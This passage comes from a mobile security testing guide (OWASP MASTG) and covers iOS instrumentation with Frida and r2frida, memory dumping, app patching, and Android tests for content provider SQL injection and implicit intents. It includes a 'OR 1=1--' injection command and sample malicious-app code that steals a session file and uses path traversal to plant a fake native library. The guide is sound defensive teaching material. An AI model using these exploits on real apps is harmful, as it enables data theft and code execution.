$ rm -rf Payload/UnCrackable\\ Level\\ 1.app/_CodeSignature\n$ /usr/bin/codesign --force --sign 8004380F331DCA22CC1B47FB1A805890AE41C938 Payload/UnCrackable\\ Level\\ 1.app/FridaGadget.dylib\nPayload/UnCrackable Level 1.app/FridaGadget.dylib: replacing existing signature\n
entitlements.plist
is the file you created for your empty iOS project.
$ /usr/bin/codesign --force --sign 8004380F331DCA22CC1B47FB1A805890AE41C938 --entitlements entitlements.plist Payload/UnCrackable\\ Level\\ 1.app/UnCrackable\\ Level\\ 1\nPayload/UnCrackable Level 1.app/UnCrackable Level 1: replacing existing signature\n
Now you should be ready to run the modified app. Deploy and run the app on the device using ios-deploy:
ios-deploy --debug --bundle Payload/UnCrackable\\ Level\\ 1.app/\n
If everything went well, the app should start in debugging mode with LLDB attached. Frida should then be able to attach to the app as well. You can verify this via the frida-ps command:
$ frida-ps -U\nPID Name\n--- ------\n499 Gadget\n
When something goes wrong (and it usually does), mismatches between the provisioning profile and code-signing header are the most likely causes. Reading the official documentation helps you understand the code-signing process. Apple's entitlement troubleshooting page is also a useful resource.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0094/","title":"Getting Loaded Classes and Methods dynamically","text":"In the Frida REPL Objective-C runtime the ObjC
command can be used to access information within the running app. Within the ObjC
command the function enumerateLoadedClasses
lists the loaded classes for a given application.
$ frida -U -f com.iOweApp\n\n[iPhone::com.iOweApp]-> ObjC.enumerateLoadedClasses()\n{\n \"/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation\": [\n \"__NSBlockVariable__\",\n \"__NSGlobalBlock__\",\n \"__NSFinalizingBlock__\",\n \"__NSAutoBlock__\",\n \"__NSMallocBlock__\",\n \"__NSStackBlock__\"\n ],\n \"/private/var/containers/Bundle/Application/F390A491-3524-40EA-B3F8-6C1FA105A23A/iOweApp.app/iOweApp\": [\n \"JailbreakDetection\",\n \"CriticalLogic\",\n \"ViewController\",\n \"AppDelegate\"\n ]\n}\n
Using ObjC.classes.<classname>.$ownMethods
the methods declared in each class can be listed.
[iPhone::com.iOweApp]-> ObjC.classes.JailbreakDetection.$ownMethods\n[\n \"+ isJailbroken\"\n]\n\n[iPhone::com.iOweApp]-> ObjC.classes.CriticalLogic.$ownMethods\n[\n \"+ doSha256:\",\n \"- a:\",\n \"- AES128Operation:data:key:iv:\",\n \"- coreLogic\",\n \"- bat\",\n \"- b:\",\n \"- hexString:\"\n]\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0095/","title":"Method Hooking","text":""},{"location":"MASTG/techniques/ios/MASTG-TECH-0095/#frida","title":"Frida","text":"In section \"Execution Tracing\" we've used frida-trace when navigating to a website in Safari and found that the initWithURL:
method is called to initialize a new URL request object. We can look up the declaration of this method on the Apple Developer Website:
- (instancetype)initWithURL:(NSURL *)url;\n
Using this information we can write a Frida script that intercepts the initWithURL:
method and prints the URL passed to the method. The full script is below. Make sure you read the code and inline comments to understand what's going on.
import sys\nimport frida\n\n\n# JavaScript to be injected\nfrida_code = \"\"\"\n\n // Obtain a reference to the initWithURL: method of the NSURLRequest class\n var URL = ObjC.classes.NSURLRequest[\"- initWithURL:\"];\n\n // Intercept the method\n Interceptor.attach(URL.implementation, {\n onEnter: function(args) {\n // Get a handle on NSString\n var NSString = ObjC.classes.NSString;\n\n // Obtain a reference to the NSLog function, and use it to print the URL value\n // args[2] refers to the first method argument (NSURL *url)\n var NSLog = new NativeFunction(Module.findExportByName('Foundation', 'NSLog'), 'void', ['pointer', '...']);\n\n // We should always initialize an autorelease pool before interacting with Objective-C APIs\n var pool = ObjC.classes.NSAutoreleasePool.alloc().init();\n\n try {\n // Creates a JS binding given a NativePointer.\n var myNSURL = new ObjC.Object(args[2]);\n\n // Create an immutable ObjC string object from a JS string object.\n var str_url = NSString.stringWithString_(myNSURL.toString());\n\n // Call the iOS NSLog function to print the URL to the iOS device logs\n NSLog(str_url);\n\n // Use Frida's console.log to print the URL to your terminal\n console.log(str_url);\n\n } finally {\n pool.release();\n }\n }\n });\n\"\"\"\n\nprocess = frida.get_usb_device().attach(\"Safari\")\nscript = process.create_script(frida_code)\nscript.load()\n\nsys.stdin.read()\n
Start Safari on the iOS device. Run the above Python script on your connected host and open the device log (as explained in the section \"Monitoring System Logs\" from the chapter \"iOS Basic Security Testing\"). Try opening a new URL in Safari, e.g. https://github.com/OWASP/owasp-mastg; you should see Frida's output in the logs as well as in your terminal.
Of course, this example illustrates only one of the things you can do with Frida. To unlock the tool's full potential, you should learn to use its JavaScript API. The documentation section of the Frida website has a tutorial and examples for using Frida on iOS.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0096/","title":"Process Exploration","text":"When testing an app, process exploration can provide the tester with deep insights into the app process memory. It can be achieved via runtime instrumentation and allows to perform tasks such as:
As you can see, these tasks are rather supportive and/or passive, they'll help us collect data and information that will support other techniques. Therefore, they're normally used in combination with other techniques such as method hooking.
In the following sections you will be using r2frida to retrieve information straight from the app runtime. First start by opening an r2frida session to the target app (e.g. iGoat-Swift) that should be running on your iPhone (connected per USB). Use the following command:
r2 frida://usb//iGoat-Swift\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0096/#memory-maps-and-inspection","title":"Memory Maps and Inspection","text":"You can retrieve the app's memory maps by running :dm
:
[0x00000000]> :dm\n0x0000000100b7c000 - 0x0000000100de0000 r-x /private/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app/iGoat-Swift\n0x0000000100de0000 - 0x0000000100e68000 rw- /private/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app/iGoat-Swift\n0x0000000100e68000 - 0x0000000100e97000 r-- /private/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app/iGoat-Swift\n...\n0x0000000100ea8000 - 0x0000000100eb0000 rw-\n0x0000000100eb0000 - 0x0000000100eb4000 r--\n0x0000000100eb4000 - 0x0000000100eb8000 r-x /usr/lib/TweakInject.dylib\n0x0000000100eb8000 - 0x0000000100ebc000 rw- /usr/lib/TweakInject.dylib\n0x0000000100ebc000 - 0x0000000100ec0000 r-- /usr/lib/TweakInject.dylib\n0x0000000100f60000 - 0x00000001012dc000 r-x /private/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app/Frameworks/Realm.framework/Realm\n
While you're searching or exploring the app memory, you can always verify where your current offset is located in the memory map. Instead of noting and searching for the memory address in this list you can simply run :dm.
. You'll find an example in the following section \"In-Memory Search\".
If you're only interested into the modules (binaries and libraries) that the app has loaded, you can use the command :il
to list them all:
[0x00000000]> :il\n0x0000000100b7c000 iGoat-Swift\n0x0000000100eb4000 TweakInject.dylib\n0x00000001862c0000 SystemConfiguration\n0x00000001847c0000 libc++.1.dylib\n0x0000000185ed9000 Foundation\n0x000000018483c000 libobjc.A.dylib\n0x00000001847be000 libSystem.B.dylib\n0x0000000185b77000 CFNetwork\n0x0000000187d64000 CoreData\n0x00000001854b4000 CoreFoundation\n0x00000001861d3000 Security\n0x000000018ea1d000 UIKit\n0x0000000100f60000 Realm\n
As you might expect you can correlate the addresses of the libraries with the memory maps: e.g. the main app binary iGoat-Swift is located at 0x0000000100b7c000
and the Realm Framework at 0x0000000100f60000
.
You can also use objection to display the same information.
$ objection --gadget OWASP.iGoat-Swift explore\n\nOWASP.iGoat-Swift on (iPhone: 11.1.2) [usb] # memory list modules\nSave the output by adding `--json modules.json` to this command\n\nName Base Size Path\n-------------------------------- ----------- -------------------- ------------------------------------------------------------------------------\niGoat-Swift 0x100b7c000 2506752 (2.4 MiB) /var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGo...\nTweakInject.dylib 0x100eb4000 16384 (16.0 KiB) /usr/lib/TweakInject.dylib\nSystemConfiguration 0x1862c0000 446464 (436.0 KiB) /System/Library/Frameworks/SystemConfiguration.framework/SystemConfiguratio...\nlibc++.1.dylib 0x1847c0000 368640 (360.0 KiB) /usr/lib/libc++.1.dylib\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0096/#in-memory-search","title":"In-Memory Search","text":"In-memory search is a very useful technique to test for sensitive data that might be present in the app memory.
See r2frida's help on the search command (\\/?
) to learn about the search command and get a list of options. The following shows only a subset of them:
[0x00000000]> \\/?\n / search\n /j search json\n /w search wide\n /wj search wide json\n /x search hex\n /xj search hex json\n...\n
You can adjust your search by using the search settings \\e~search
. For example, \\e search.quiet=true;
will print only the results and hide search progress:
[0x00000000]> \\e~search\ne search.in=perm:r--\ne search.quiet=false\n
For now, we'll continue with the defaults and concentrate on string search. In this first example, you can start by searching for something that you know should be located in the main binary of the app:
[0x00000000]> \\/ iGoat\nSearching 5 bytes: 69 47 6f 61 74\nSearching 5 bytes in [0x0000000100b7c000-0x0000000100de0000]\n...\nhits: 509\n0x100d7d332 hit2_0 iGoat_Swift24StringAnalysisExerciseVCC\n0x100d7d3b2 hit2_1 iGoat_Swift28BrokenCryptographyExerciseVCC\n0x100d7d442 hit2_2 iGoat_Swift23BackgroundingExerciseVCC\n0x100d7d4b2 hit2_3 iGoat_Swift9AboutCellC\n0x100d7d522 hit2_4 iGoat_Swift12FadeAnimatorV\n
Now take the first hit, seek to it and check your current location in the memory map:
[0x00000000]> s 0x100d7d332\n[0x100d7d332]> :dm.\n0x0000000100b7c000 - 0x0000000100de0000 r-x /private/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app/iGoat-Swift\n
As expected, you are located in the region of the main iGoat-Swift binary (r-x, read and execute). In the previous section, you saw that the main binary is located between 0x0000000100b7c000
and 0x0000000100e97000
.
Now, for this second example, you can search for something that's not in the app binary nor in any loaded library, typically user input. Open the iGoat-Swift app and navigate in the menu to Authentication -> Remote Authentication -> Start. There you'll find a password field that you can overwrite. Write the string \"owasp-mstg\" but do not click on Login just yet. Perform the following two steps.
[0x00000000]> \\/ owasp-mstg\nhits: 1\n0x1c06619c0 hit3_0 owasp-mstg\n
In fact, the string could be found at address 0x1c06619c0
. Seek s
to there and retrieve the current memory region with :dm.
.
[0x100d7d332]> s 0x1c06619c0\n[0x1c06619c0]> :dm.\n0x00000001c0000000 - 0x00000001c8000000 rw-\n
Now you know that the string is located in a rw- (read and write) region of the memory map.
Additionally, you can search for occurrences of the wide version of the string (/w
) and, again, check their memory regions:
This time we run the \\dm.
command for all @@
hits matching the glob hit5_*
.
[0x00000000]> /w owasp-mstg\nSearching 20 bytes: 6f 00 77 00 61 00 73 00 70 00 2d 00 6d 00 73 00 74 00 67 00\nSearching 20 bytes in [0x0000000100708000-0x000000010096c000]\n...\nhits: 2\n0x1020d1280 hit5_0 6f0077006100730070002d006d00730074006700\n0x1030c9c85 hit5_1 6f0077006100730070002d006d00730074006700\n\n[0x00000000]> \\dm.@@ hit5_*\n0x0000000102000000 - 0x0000000102100000 rw-\n0x0000000103084000 - 0x00000001030cc000 rw-\n
They are in a different rw- region. Note that searching for the wide versions of strings is sometimes the only way to find them as you'll see in the following section.
In-memory search can be very useful to quickly know if certain data is located in the main app binary, inside a shared library or in another region. You may also use it to test the behavior of the app regarding how the data is kept in memory. For instance, you could continue the previous example, this time clicking on Login and searching again for occurrences of the data. Also, you may check if you still can find those strings in memory after the login is completed to verify if this sensitive data is wiped from memory after its use.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0096/#memory-dump","title":"Memory Dump","text":"You can dump the app's process memory with objection and Fridump. To take advantage of these tools on a non-jailbroken device, the Android app must be repackaged with frida-gadget.so
and re-signed. A detailed explanation of this process is in the section \"Dynamic Analysis on Non-Jailbroken Devices. To use these tools on a jailbroken phone, simply have frida-server installed and running.
With objection it is possible to dump all memory of the running process on the device by using the command memory dump all
.
$ objection explore\n\niPhone on (iPhone: 10.3.1) [usb] # memory dump all /Users/foo/memory_iOS/memory\nDumping 768.0 KiB from base: 0x1ad200000 [####################################] 100%\nMemory dumped to file: /Users/foo/memory_iOS/memory\n
Alternatively you can use Fridump. First, you need the name of the app you want to dump, which you can get with frida-ps
.
$ frida-ps -U\n PID Name\n---- ------\n1026 Gadget\n
Afterwards, specify the app name in Fridump.
$ python3 fridump.py -u Gadget -s\n\nCurrent Directory: /Users/foo/PentestTools/iOS/fridump\nOutput directory is set to: /Users/foo/PentestTools/iOS/fridump/dump\nCreating directory...\nStarting Memory dump...\nProgress: [##################################################] 100.0% Complete\n\nRunning strings on all files:\nProgress: [##################################################] 100.0% Complete\n\nFinished! Press Ctrl+C\n
When you add the -s
flag, all strings are extracted from the dumped raw memory files and added to the file strings.txt
, which is stored in Fridump's dump directory.
In both cases, if you open the file in radare2 you can use its search command (/
). Note that first we do a standard string search which doesn't succeed and next we search for a wide string, which successfully finds our string \"owasp-mstg\".
$ r2 memory_ios\n[0x00000000]> / owasp-mstg\nSearching 10 bytes in [0x0-0x628c000]\nhits: 0\n[0x00000000]> /w owasp-mstg\nSearching 20 bytes in [0x0-0x628c000]\nhits: 1\n0x0036f800 hit4_0 6f0077006100730070002d006d00730074006700\n
Next, we can seek to its address using s 0x0036f800
or s hit4_0
and print it using psw
(which stands for print string wide) or use px
to print its raw hexadecimal values:
[0x0036f800]> psw\nowasp-mstg\n\n[0x0036f800]> px 48\n- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF\n0x0036f800 6f00 7700 6100 7300 7000 2d00 6d00 7300 o.w.a.s.p.-.m.s.\n0x0036f810 7400 6700 0000 0000 0000 0000 0000 0000 t.g.............\n0x0036f820 0000 0000 0000 0000 0000 0000 0000 0000 ................\n
Note that in order to find this string using the strings
command you'll have to specify an encoding using the -e
flag and in this case l
for 16-bit little-endian character.
$ strings -e l memory_ios | grep owasp-mstg\nowasp-mstg\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0097/","title":"Runtime Reverse Engineering","text":"Runtime reverse engineering can be seen as the on-the-fly version of reverse engineering where you don't have the binary data to your host computer. Instead, you'll analyze it straight from the memory of the app.
We'll keep using the iGoat-Swift app, open a session with r2frida r2 frida://usb//iGoat-Swift
and you can start by displaying the target binary information by using the :i
command:
[0x00000000]> :i\narch arm\nbits 64\nos darwin\npid 2166\nuid 501\nobjc true\nruntime V8\njava false\ncylang true\npageSize 16384\npointerSize 8\ncodeSigningPolicy optional\nisDebuggerAttached false\ncwd /\n
Search all symbols of a certain module with :is <lib>
, e.g. :is libboringssl.dylib
.
The following does a case-insensitive search (grep) for symbols including \"aes\" (~+aes
).
[0x00000000]> \\is libboringssl.dylib~+aes\n0x1863d6ed8 s EVP_aes_128_cbc\n0x1863d6ee4 s EVP_aes_192_cbc\n0x1863d6ef0 s EVP_aes_256_cbc\n0x1863d6f14 s EVP_has_aes_hardware\n0x1863d6f1c s aes_init_key\n0x1863d728c s aes_cipher\n0x0 u ccaes_cbc_decrypt_mode\n0x0 u ccaes_cbc_encrypt_mode\n...\n
Or you might prefer to look into the imports/exports. For example:
:ii iGoat-Swift
.:iE /usr/lib/libc++.1.dylib
.For big binaries it's recommended to pipe the output to the internal less program by appending ~..
, i.e. :ii iGoat-Swift~..
(if not, for this binary, you'd get almost 5000 lines printed to your terminal).
The next thing you might want to look at are the classes:
[0x00000000]> \\ic~+passcode\nPSPasscodeField\n_UITextFieldPasscodeCutoutBackground\nUIPasscodeField\nPasscodeFieldCell\n...\n
List class fields:
[0x19687256c]> \\ic UIPasscodeField\n0x000000018eec6680 - becomeFirstResponder\n0x000000018eec5d78 - appendString:\n0x000000018eec6650 - canBecomeFirstResponder\n0x000000018eec6700 - isFirstResponder\n0x000000018eec6a60 - hitTest:forEvent:\n0x000000018eec5384 - setKeyboardType:\n0x000000018eec5c8c - setStringValue:\n0x000000018eec5c64 - stringValue\n...\n
Imagine that you are interested into 0x000000018eec5c8c - setStringValue:
. You can seek to that address with s 0x000000018eec5c8c
, analyze that function af
and print 10 lines of its disassembly pd 10
:
[0x18eec5c8c]> pd 10\n\u256d (fcn) fcn.18eec5c8c 35\n\u2502 fcn.18eec5c8c (int32_t arg1, int32_t arg3);\n\u2502 bp: 0 (vars 0, args 0)\n\u2502 sp: 0 (vars 0, args 0)\n\u2502 rg: 2 (vars 0, args 2)\n\u2502 0x18eec5c8c f657bd not byte [rdi - 0x43] ; arg1\n\u2502 0x18eec5c8f a9f44f01a9 test eax, 0xa9014ff4\n\u2502 0x18eec5c94 fd std\n\u2502 \u256d\u2500< 0x18eec5c95 7b02 jnp 0x18eec5c99\n\u2502 \u2502 0x18eec5c97 a9fd830091 test eax, 0x910083fd\n\u2502 0x18eec5c9c f30300 add eax, dword [rax]\n\u2502 0x18eec5c9f aa stosb byte [rdi], al\n\u2502 \u256d\u2500< 0x18eec5ca0 e003 loopne 0x18eec5ca5\n\u2502 \u2502 0x18eec5ca2 02aa9b494197 add ch, byte [rdx - 0x68beb665] ; arg3\n\u2570 0x18eec5ca8 f4 hlt\n
Finally, instead of doing a full memory search for strings, you may want to retrieve the strings from a certain binary and filter them, as you'd do offline with radare2. For this you have to find the binary, seek to it and then run the :iz
command.
It's recommended to apply a filter with a keyword ~<keyword>
/~+<keyword>
to minimize the terminal output. If just want to explore all results you can also pipe them to the internal less \\iz~..
.
[0x00000000]> :il~iGoa\n0x00000001006b8000 iGoat-Swift\n[0x00000000]> s 0x00000001006b8000\n[0x1006b8000]> :iz\nReading 2.390625MB ...\nDo you want to print 8568 lines? (y/N) N\n[0x1006b8000]> :iz~+hill\nReading 2.390625MB ...\n[0x1006b8000]> :iz~+pass\nReading 2.390625MB ...\n0x00000001006b93ed \"passwordTextField\"\n0x00000001006bb11a \"11iGoat_Swift20KeychainPasswordItemV0C5ErrorO\"\n0x00000001006bb164 \"unexpectedPasswordData\"\n0x00000001006d3f62 \"Error reading password from keychain - \"\n0x00000001006d40f2 \"Incorrect Password\"\n0x00000001006d4112 \"Enter the correct password\"\n0x00000001006d4632 \"T@\"UITextField\",N,W,VpasswordField\"\n0x00000001006d46f2 \"CREATE TABLE IF NOT EXISTS creds (id INTEGER PRIMARY KEY AUTOINCREMENT, username TEXT, password TEXT);\"\n0x00000001006d4792 \"INSERT INTO creds(username, password) VALUES(?, ?)\"\n
To learn more, please refer to the r2frida wiki.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0098/","title":"Patching React Native Apps","text":"If the React Native framework has been used for development, the main application code is in the file Payload/[APP].app/main.jsbundle
. This file contains the JavaScript code. Most of the time, the JavaScript code in this file is minified. With the tool JStillery, a human-readable version of the file can be retried, which will allow code analysis. The CLI version of JStillery and the local server are preferable to the online version because the latter discloses the source code to a third party.
At installation time, the application archive is unpacked into the folder /private/var/containers/Bundle/Application/[GUID]/[APP].app
from iOS 10 onward, so the main JavaScript application file can be modified at this location.
To identify the exact location of the application folder, you can use the tool ipainstaller:
ipainstaller -l
to list the applications installed on the device. Get the name of the target application from the output list.ipainstaller -i [APP_NAME]
to display information about the target application, including the installation and data folder locations.Application:
.Use the following approach to patch the JavaScript file:
Payload/[APP].app/main.jsbundle
to a temporary file.JStillery
to beautify and de-obfuscate the contents of the temporary file.Payload/[APP].app/main.jsbundle
file.Make sure that the unlocked key is used during the application flow. For example, the key may be used to decrypt local storage or a message received from a remote endpoint. If the application simply checks whether the user has unlocked the key or not, the application may be vulnerable to a local authentication bypass.
"},{"location":"MASTG/tests/android/MASVS-AUTH/MASTG-TEST-0017/#dynamic-analysis","title":"Dynamic Analysis","text":"Validate the duration of time (seconds) for which the key is authorized to be used after the user is successfully authenticated. This is only needed if setUserAuthenticationRequired
is used.
Note that there are quite some vendor/third party SDKs, which provide biometric support, but which have their own insecurities. Be very cautious when using third party SDKs to handle sensitive authentication logic.
"},{"location":"MASTG/tests/android/MASVS-AUTH/MASTG-TEST-0018/#dynamic-analysis","title":"Dynamic Analysis","text":"Please take a look at this detailed blog article about the Android KeyStore and Biometric authentication. This research includes two Frida scripts which can be used to test insecure implementations of biometric authentication and try to bypass them:
CryptoObject
is not used in the authenticate
method of the BiometricPrompt
class. The authentication implementation relies on the callback onAuthenticationSucceded
being called.CryptoObject
is used, but used in an incorrect way. The detailed explanation can be found in the section \"Crypto Object Exception Handling\" in the blog post.For any publicly accessible data storage, any process can override the data. This means that input validation needs to be applied the moment the data is read back again.
Note: The same is true for private accessible data on a rooted device
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0002/#static-analysis","title":"Static analysis","text":""},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0002/#using-shared-preferences","title":"Using Shared Preferences","text":"When you use the SharedPreferences.Editor
to read or write int/boolean/long values, you cannot check whether the data is overridden or not. However: it can hardly be used for actual attacks other than chaining the values (e.g. no additional exploits can be packed which will take over the control flow). In the case of a String
or a StringSet
you should be careful with how the data is interpreted. Using reflection based persistence? Check the section on \"Testing Object Persistence\" for Android to see how it should be validated. Using the SharedPreferences.Editor
to store and read certificates or keys? Make sure you have patched your security provider given vulnerabilities such as found in Bouncy Castle.
In all cases, having the content HMACed can help to ensure that no additions and/or changes have been applied.
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0002/#using-other-storage-mechanisms","title":"Using Other Storage Mechanisms","text":"In case other public storage mechanisms (than the SharedPreferences.Editor
) are used, the data needs to be validated the moment it is read from the storage mechanism.
To test for injection flaws you need to first rely on other tests and check for functionality that might have been exposed:
An example of a vulnerable IPC mechanism is shown below.
You can use ContentProviders to access database information, and you can probe services to see if they return data. If data is not validated properly, the content provider may be prone to SQL injection while other apps are interacting with it. See the following vulnerable implementation of a ContentProvider.
<provider\n android:name=\".OMTG_CODING_003_SQL_Injection_Content_Provider_Implementation\"\n android:authorities=\"sg.vp.owasp_mobile.provider.College\">\n</provider>\n
The AndroidManifest.xml
above defines a content provider that's exported and therefore available to all other apps. The query
function in the OMTG_CODING_003_SQL_Injection_Content_Provider_Implementation.java
class should be inspected.
@Override\npublic Cursor query(Uri uri, String[] projection, String selection,String[] selectionArgs, String sortOrder) {\n SQLiteQueryBuilder qb = new SQLiteQueryBuilder();\n qb.setTables(STUDENTS_TABLE_NAME);\n\n switch (uriMatcher.match(uri)) {\n case STUDENTS:\n qb.setProjectionMap(STUDENTS_PROJECTION_MAP);\n break;\n\n case STUDENT_ID:\n // SQL Injection when providing an ID\n qb.appendWhere( _ID + \"=\" + uri.getPathSegments().get(1));\n Log.e(\"appendWhere\",uri.getPathSegments().get(1).toString());\n break;\n\n default:\n throw new IllegalArgumentException(\"Unknown URI \" + uri);\n }\n\n if (sortOrder == null || sortOrder == \"\"){\n /**\n * By default sort on student names\n */\n sortOrder = NAME;\n }\n Cursor c = qb.query(db, projection, selection, selectionArgs,null, null, sortOrder);\n\n /**\n * register to watch a content URI for changes\n */\n c.setNotificationUri(getContext().getContentResolver(), uri);\n return c;\n}\n
While the user is providing a STUDENT_ID at content://sg.vp.owasp_mobile.provider.College/students
, the query statement is prone to SQL injection. Obviously prepared statements must be used to avoid SQL injection, but input validation should also be applied so that only input that the app is expecting is processed.
All app functions that process data coming in through the UI should implement input validation:
public boolean isAlphaNumeric(String s){\n String pattern= \"^[a-zA-Z0-9]*$\";\n return s.matches(pattern);\n}\n
An alternative to validation functions is type conversion, with, for example, Integer.parseInt
if only integers are expected. The OWASP Input Validation Cheat Sheet contains more information about this topic.
The tester should manually test the input fields with strings like OR 1=1--
if, for example, a local SQL injection vulnerability has been identified.
On a rooted device, the command content can be used to query the data from a content provider. The following command queries the vulnerable function described above.
# content query --uri content://sg.vp.owasp_mobile.provider.College/students\n
SQL injection can be exploited with the following command. Instead of getting the record for Bob only, the user can retrieve all data.
# content query --uri content://sg.vp.owasp_mobile.provider.College/students --where \"name='Bob') OR 1=1--''\"\n
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0026/","title":"Testing Implicit Intents","text":""},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0026/#overview","title":"Overview","text":"When testing for implicit intents you need to check if they are vulnerable to injection attacks or potentially leaking sensitive data.
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0026/#static-analysis","title":"Static Analysis","text":"Inspect the Android Manifest and look for any <intent>
signatures defined inside blocks (which specify the set of other apps an app intends to interact with), check if it contains any system actions (e.g. android.intent.action.GET_CONTENT
, android.intent.action.PICK
, android.media.action.IMAGE_CAPTURE
, etc.) and browse the source code for their occurrence.
For example, the following Intent
doesn't specify any concrete component, meaning that it's an implicit intent. It sets the action android.intent.action.GET_CONTENT
to ask the user for input data and then the app starts the intent by startActivityForResult
and specifying an image chooser.
Intent intent = new Intent();\nintent.setAction(\"android.intent.action.GET_CONTENT\");\nstartActivityForResult(Intent.createChooser(intent, \"\"), REQUEST_IMAGE);\n
The app uses startActivityForResult
instead of startActivity
, indicating that it expects a result (in this case an image), so you should check how the return value of the intent is handled by looking for the onActivityResult
callback. If the return value of the intent isn't properly validated, an attacker may be able to read arbitrary files or execute arbitrary code from the app's internal `/data/data/' storage. A full description of this type of attack can be found in the following blog post."},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0026/#case-1-arbitrary-file-read","title":"Case 1: Arbitrary File Read","text":"
In this example we're going to see how an attacker can read arbitrary files from within the app's internal storage /data/data/<appname>
due to the improper validation of the return value of the intent.
The performAction
method in the following example reads the implicit intents return value, which can be an attacker provided URI and hands it to getFileItemFromUri
. This method copies the file to a temp folder, which is usual if this file is displayed internally. But if the app stores the URI provided file in an external temp directory e.g by calling getExternalCacheDir
or getExternalFilesDir
an attacker can read this file if he sets the permission android.permission.READ_EXTERNAL_STORAGE
.
private void performAction(Action action){\n ...\n Uri data = intent.getData();\n if (!(data == null || (fileItemFromUri = getFileItemFromUri(data)) == null)) {\n ...\n }\n}\n\nprivate FileItem getFileItemFromUri(Context, context, Uri uri){\n String fileName = UriExtensions.getFileName(uri, context);\n File file = new File(getExternalCacheDir(), \"tmp\");\n file.createNewFile();\n copy(context.openInputStream(uri), new FileOutputStream(file));\n ...\n}\n
The following is the source of a malicious app that exploits the above vulnerable code.
AndroidManifest.xml
<uses-permission android:name=\"android.permission.READ_EXTERNAL_STORAGE\" />\n<application>\n <activity android:name=\".EvilContentActivity\">\n <intent-filter android:priority=\"999\">\n <action android:name=\"android.intent.action.GET_CONTENT\" />\n <data android:mimeType=\"*/*\" />\n </intent-filter>\n </activity>\n</application>\n
EvilContentActivity.java
public class EvilContentActivity extends Activity{\n @Override\n protected void OnCreate(@Nullable Bundle savedInstanceState){\n super.OnCreate(savedInstanceState);\n setResult(-1, new Intent().setData(Uri.parse(\"file:///data/data/<victim_app>/shared_preferences/session.xml\")));\n finish();\n }\n}\n
If the user selects the malicious app to handle the intent, the attacker can now steal the session.xml
file from the app's internal storage. In the previous example, the victim must explicitly select the attacker's malicious app in a dialog. However, developers may choose to suppress this dialog and automatically determine a recipient for the intent. This would allow the attack to occur without any additional user interaction.
The following code sample implements this automatic selection of the recipient. By specifying a priority in the malicious app's intent filter, the attacker can influence the selection sequence.
Intent intent = new Intent(\"android.intent.action.GET_CONTENT\");\nfor(ResolveInfo info : getPackageManager().queryIntentActivities(intent, 0)) {\n intent.setClassName(info.activityInfo.packageName, info.activityInfo.name);\n startActivityForResult(intent);\n return;\n}\n
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0026/#case-2-arbitrary-code-execution","title":"Case 2: Arbitrary Code Execution","text":"An improperly handled return value of an implicit intent can lead to arbitrary code execution if the victim app allows content://
and file://
URLs.
An attacker can implement a ContentProvider
that contains public Cursor query(...)
to set an arbitrary file (in this case lib.so), and if the victim loads this file from the content provider by executing copy
the attacker's ParcelFileDescriptor openFile(...)
method will be executed and return a malicious fakelib.so.
AndroidManifest.xml
<uses-permission android:name=\"android.permission.READ_EXTERNAL_STORAGE\" />\n<application>\n <activity android:name=\".EvilContentActivity\">\n <intent-filter android:priority=\"999\">\n <action android:name=\"android.intent.action.GET_CONTENT\" />\n <data android:mimeType=\"*/*\" />\n </intent-filter>\n </activity>\n <provider android:name=\".EvilContentProvider\" android:authorities=\"com.attacker.evil\" android:enabled=\"true\" android:exported=\"true\"></provider>\n</application>\n
EvilContentProvider.java
public Cursor query(Uri uri, String[] projection, String selection, String[] selectionArgs, String sortOrder) {\n MatrixCursor matrixCursor = new MatrixCursor(new String[]{\"_display_name\"});\n matrixCursor.addRow(new Object[]{\"../lib-main/lib.so\"});\n return matrixCursor;\n}\npublic ParcelFileDescriptor openFile(Uri uri, String mode) throws FileNotFoundException {\n return ParcelFileDescriptor.open(new File(\"/data/data/com.attacker/fakelib.so\"), ParcelFileDescriptor.MODE_READ_ONLY);\n}\n
EvilContentActivity.java
public class EvilContentActivity extends Activity{\n @Override\n protected void OnCreate(@Nullable Bundle savedInstanceState){\n super.OnCreate(savedInstanceState);\n setResult(-1, new Intent().setData(Uri.parse(\"content:///data/data/com.attacker/fakelib.so\")));\n finish();\n }\n}\n
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0026/#dynamic-analysis","title":"Dynamic Analysis","text":"A convenient way to dynamically test for implicit intents, especially to identify potentially leaked sensitive data, is to use Frida or frida-trace and hook the startActivityForResult
and onActivityResult
methods and inspect the provided intents and the data they contain.
In order to test for URL loading in WebViews you need to carefully analyze handling page navigation, especially when users might be able to navigate away from a trusted environment. The default and safest behavior on Android is to let the default web browser open any link that the user might click inside the WebView. However, this default logic can be modified by configuring a WebViewClient
which allows navigation requests to be handled by the app itself.
To test if the app is overriding the default page navigation logic by configuring a WebViewClient
you should search for and inspect the following interception callback functions:
shouldOverrideUrlLoading
allows your application to either abort loading WebViews with suspicious content by returning true
or allow the WebView to load the URL by returning false
. Considerations:<script>
